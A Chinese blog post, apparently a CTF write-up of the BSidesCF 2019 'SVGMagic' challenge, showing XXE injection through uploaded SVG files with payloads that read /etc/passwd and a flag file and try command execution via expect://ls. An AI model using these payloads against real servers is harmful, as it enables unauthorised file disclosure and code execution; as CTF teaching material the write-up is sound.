[BSidesCF 2019]SVGMagic XXE的SVG注入

最新推荐文章于 2022-12-22 22:46:15 发布
最新推荐文章于 2022-12-22 22:46:15 发布
阅读量782 收藏 2
点赞数 2
文章标签: webview android java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54929891/article/details/124758286
版权

进入题目可以看到叫我们利用魔法将SVG转为PNG,查资料了解一下SVG是个啥东西 XML的SVG知识总结_叨唠的博客-CSDN博客_svg xml

是一个图片,既然是XML里面的图片标签,那么则可以往XXE注入里面想想,但是SVG不知道怎么构造浅谈SVG的两个黑魔法 - 知乎 

我们可以利用text标签来显现文字,将文字改为引用我们的恶意代码即可 

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [
  <!ENTITY www SYSTEM "file:///etc/passwd">
 ]>
<svg width="100" height="100">
   <text x="20" y="20">&www;</text>
</svg>

后缀改为svg上传

 发现我们的宽度似乎不够,没输出完,改个10000瞅瞅

注入成功,现在我们只需要改注入代码即可

-----已搬运-------Linux的/proc/self/学习 ++ CTF例题_Zero_Adam的博客-CSDN博客_proc/self

利用cwd命令来获取当前状态下的目录文件

 

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [
  <!ENTITY www SYSTEM "file:///proc/self/cwd">
 ]>
<svg width="1000" height="100">
   <text x="20" y="20">&www;</text>
</svg>

构造如下想查看当前目录下有哪些文件,我这里犯了一个错,file协议只能访问文件 

起初不知道,一直读取读取然后一直报错报错…… 要获取目录下文件要用ls命令

 于是我想着执行系统命令1-Web安全——XXE-XML外部实体注入_songly_的博客-CSDN博客_利用xml外部实体可以对内网端口进行扫描

 

利用php的expect模块来执行系统命令,改一下之前的模板

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [
  <!ENTITY readfile	"expect://ls">
 ]>
<svg width="1000" height="100">
   <text x="20" y="20">&readfile;</text>
</svg>

 结果

不知为啥渲染失败,想不通了,看了一下wp,清一色都是直接在cwd目录下直接读取flag.txt文件,我不知道怎么知道是这个文件的,或许是ctf题通常不会为难文件名,不是flag.php就是flag.txt吧,那我们还是用远程读取文件吧,或许以后明白为什么这里渲染失败了 

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [
  <!ENTITY www SYSTEM "file:///proc/self/cwd/flag.txt">
 ]>
<svg width="1000" height="100">
   <text x="20" y="20">&www;</text>
</svg>

 

-栀蓝-
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
react-svg:将SVG注入DOM的React组件
02-03
React-svg 一个将SVG注入DOM的React组件。 | | | | | 背景 假设您在某些URL上可以使用SVG,并且,您希望将其注入DOM。 该模块通过将过程委派给来为您完成繁重的工作,该过程向发出AJAX请求,然后内联交换SVG标记。 异步加载的SVG也会被缓存,因此对SVG的多种使用只需要一个服务器请求即可。 基本用法 import React from ' react ' import { render } from ' react-dom ' import { ReactSVG } from ' react-svg ' render (< ReactSVG src =
Android使用svg矢量图生成 src的xml图片文件
weixin_42602900的博客
08-10 2207
Android使用svg矢量图生成 src的xml图片文件
【Android】导入svg矢量图片并成功使用该矢量图生成的xml
weixin_44002043的博客
06-30 626
导入svg
SVG入门-嵌入XML和转Base64
natsu-cc的博客
03-25 4141
<foreignObject>标签 <foreignObject>是SVG的一个子标签,这个标签中可以用于显示普通的DOM标签。也就是渲染XHTML元素。 举个例子: <svg xmlns="http://www.w3.org/2000/svg"> <foreignObject width="120" height="50"> <body xmlns="http://www.w3.org/1999/xhtml">
svg基本使用
qq_27628085的博客
03-04 733
1.什么是SVG 指可伸缩矢量图形 用来定义用于网络的基于矢量的图形 XML 格式定义图形 图像在放大或改变尺寸的情况下其图形质量不会有所损失 是万维网联盟的标准 与诸如 DOM 和 XSL 之类的 W3C 标准是一个整体 2.语法: &lt;?xml version="1.0" standalone="no"?&gt; &lt;!DOCTYPE svg PUBLIC "-//...
【nuxt3】项目中使用svg 7步带你了解
枫ゞ的博客
12-22 2302
【nuxt3】项目中使用svg 7步带你了解 全文详细讲解nuxt3使用svg的各种步骤
SVG格式进行xss与xxe
yggcwhat
08-14 1282
SVG格式进行xss与xxe
如何引入svg并使用
weixin_62897746的博客
10-17 6118
如何引入svg并使用
浅谈SVG的两个黑魔法-xxe
mingyqf的博客
11-19 304
(DozerCTF2020)这道题当时比赛的时候没有做出来,因为当时水平有限,并没有想到svg也是xml格式,可以用来XXE,这道题确实质量可以,学到了很多新的姿势,下面给出我复现的过程。SVG简介SVG(Scalable Vector Graphics)是一种基于XML的二维矢量图格式,和我们平常用的jpg/png等图片格式所不同的是SVG图像在放大或改变尺寸的情况下其图形质量不会有所损失,并且我们可以使用任何的文本编辑器打开SVG图片并且编辑它,目前主流的浏览器都已经支持SVG图片的渲染。
XXE(外部实体注入)| PortSwigger(burpsuite官方靶场)| Part 3
bin789456的博客
03-07 674
XInclude attacks 一些应用程序接收客户端提交的数据,在服务器端将其嵌入到 XML 文档中,然后解析该文档。当客户端提交的数据被放入后端 SOAP 请求中时,就会出现这种情况的一个示例,该请求随后由后端 SOAP 服务处理。 在这种情况下,您无法执行经典的 XXE 攻击,因为您无法控制整个 XML 文档,因此无法定义或修改DOCTYPE元素。但是,您也许可以XInclude改用。XInclude是 XML 规范的一部分,它允许从子文档构建 XML 文档。您可以XInclude在 XML
WEB安全之XXE实体注入漏洞.pdf
12-12
WEB安全之XXE实体注入漏洞
测试XXE注入.docx
09-06
测试XXE注入
信息安全_xxe注入应用与拓展.pptx
08-14
什么是XXE 什么地方可能存在XXE Zend框架 Xml-rpc模块的xxe Springmvc里的xxe slim框架里的xxe 解析docx文件 XXE能干嘛 XXE怎么去读文件 XXE注入外带数据回显 XXE怎么去修复
WebGoat8-xxe注入漏洞分析
09-15
WebGoat8-xxe注入漏洞分析
测试XXE注入(1).xmind
11-25
测试XXE注入(1).xmind
SVG
sunshine的博客
09-08 341
SVG(Scalable Vector Grahpics) 可伸缩矢量图形 xmlns属性 可以在文档中定义一个或多个可供选择的命名空间。 该属性可以放置在文档内任何元素的开始标签中。 该属性的值类似于 URL,它定义了一个命名空间,浏览器会将此命名空间用于该属性所在元素内的所有内容。 特点 用来定义用于网络的基于矢量的图形 使用XML格式定义图形 图像改变尺寸的情况下质量不会损失 是万维网联盟的标准 是W3C推荐标准 在HTML页面 使用<embed>标签 <embed src="c
XML的SVG知识总结
zyz00000000的博客
09-17 6908
1. SVG (Scalable Vector Graphic)可缩放矢量图形 svg是使用 XML 来描述二维图形和绘图程序的语言,是个行级标签 场景:图标、图标icon、动效、矢量图(放大后不失真)  注意:canvas是js控件,运行性能比svg标签好 2. svg在HTML中的用法 (1)可以通过头部引入css文件(最好使用这种) (2)可以写在style标签中 (3)可以写...
svg基本知识
ab31ab的博客
11-19 481
写这篇文章的缘由是因为做dashboard的项目,图形是svg的项目,参考的项目使用div写的,然后为了改样式一直在套样式,结果套不出来,也是醉了,整理了一下svg的基本格式,从w3c上整理的,详细的列子参考https://www.w3school.com.cn/svg/svg_rect.asp 目录 svg形状 矩形 圆形 椭圆 线 多边形 折线 标签 SVG ...
SVG--xml标签语法总结
贝勒里恩的博客
04-29 1884
1、<svg>标签 功能:顶层标签,svg代码都放在<svg>之中 <svg width="100%" height="100%" xmlns="http://www.w3.org/2000/svg"> ... </svg> 2、<circle>标签 功能:该标签代表圆形,cx、cy是圆心,r是半价 <svg width="100%" height="100%" xmlns="http://www.w3.org/2000/s
svg to pdf svg2pdf
最新发布
12-29
以下是两种将SVG转换为PDF的方法: 1. 使用svg2pdf.js和jsPDF库(JavaScript): ```javascript // 引入所需的库 const svg2pdf = require('svg2pdf.js'); const jsPDF = require('jspdf'); // 创建一个空白的PDF文档 const doc = new jsPDF(); // 获取SVG元素 const svgElement = document.getElementById('your-svg-element'); // 将SVG转换为PDF svg2pdf(svgElement, doc, function() { // 保存PDF文件 doc.save('output.pdf'); }); ``` 2. 使用svg2pdf(Go): ```shell # 安装svg2pdf go get github.com/jung-kurt/gofpdf # 运行svg2pdf svg2pdf -in input.svg -out output.pdf ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值